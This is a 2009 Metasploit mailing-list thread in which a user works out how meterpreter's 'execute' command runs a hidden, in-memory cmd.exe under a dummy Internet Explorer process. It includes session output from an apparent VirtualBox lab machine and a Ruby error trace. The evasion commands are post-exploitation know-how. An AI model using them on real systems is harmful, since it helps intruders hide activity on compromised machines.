Metasploit mailing list archives

meterpreter execute from memory

From: reydecopas at gmail.com (reydecopas)
Date: Tue, 3 Feb 2009 16:19:03 +0100

Ok, clear enough...
-f local_EXE_file

meterpreter > execute -f cmd.exe -H -i -m -d
c:\\progra~1\\intern~1\\iexplore.exe
Process 176 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
System                         4 Console                 0        212 K
smss.exe                     328 Console                 0        372 K
csrss.exe                    584 Console                 0      3,328 K
winlogon.exe                 608 Console                 0      5,096 K
services.exe                 652 Console                 0      3,644 K
savedump.exe                 664 Console                 0      2,388 K
lsass.exe                    672 Console                 0      1,308 K
svchost.exe                  824 Console                 0      4,284 K
svchost.exe                  892 Console                 0      3,728 K
svchost.exe                  988 Console                 0     15,736 K
svchost.exe                 1048 Console                 0      2,844 K
svchost.exe                 1200 Console                 0      4,184 K
explorer.exe                1400 Console                 0     16,448 K
spoolsv.exe                 1540 Console                 0      4,064 K
VBoxTray.exe                1640 Console                 0      1,896 K
VBoxService.exe             1972 Console                 0      1,260 K
wscntfy.exe                  492 Console                 0      1,736 K
alg.exe                      832 Console                 0      3,144 K
wuauclt.exe                 1444 Console                 0      6,232 K
met-rev.exe                 1668 Console                 0      3,084 K
procexp.exe                 1580 Console                 0      6,604 K
wmiprvse.exe                1936 Console                 0      5,588 K
IEXPLORE.EXE                 176 Console                 0      1,516 K
tasklist.exe                2036 Console                 0      3,964 K

C:\Documents and Settings\admin\Desktop>





On Tue, Feb 3, 2009 at 3:32 PM, reydecopas <reydecopas at gmail.com> wrote:

Hi,
I don't understand the parameters of execute command (-d -m)

This works perfect:

meterpreter > execute -f cmd.exe -H -i
Process 1220 created.
Channel 33 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>


but when does it make sense to use -d and -m paremeters?
Can anyone send an example?

meterpreter > execute -h
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -m        Execute from memory.
    -t        Execute process with currently impersonated thread token




I get this error:
meterpreter > execute -f cmd.exe -H -i  -d calc.exe -m
[-] Error running command execute: No such file or directory - cmd.exe
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in
`initialize'/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in
`new'/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in
`execute'/home/user/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:120:in
`cmd_execute'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in
`run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in
`interact'/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in
`call'/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in
`run'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in
`interact'/home/user/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in
`_interact'/home/user/metasploit/lib/rex/ui/interactive.rb:48:in
`interact'/home/user/metasploit/lib/msf/ui/console/command_dispatcher/core.rb:918:in
`cmd_sessions'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/home/user/metasploit/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in
`cmd_exploit'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/home/user/metasploit/lib/rex/ui/text/shell.rb:127:in
`run'./msfconsole:82

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090203/1ec044cf/attachment.htm>

Current thread:

meterpreter execute from memory reydecopas (Feb 03)
- meterpreter execute from memory reydecopas (Feb 03)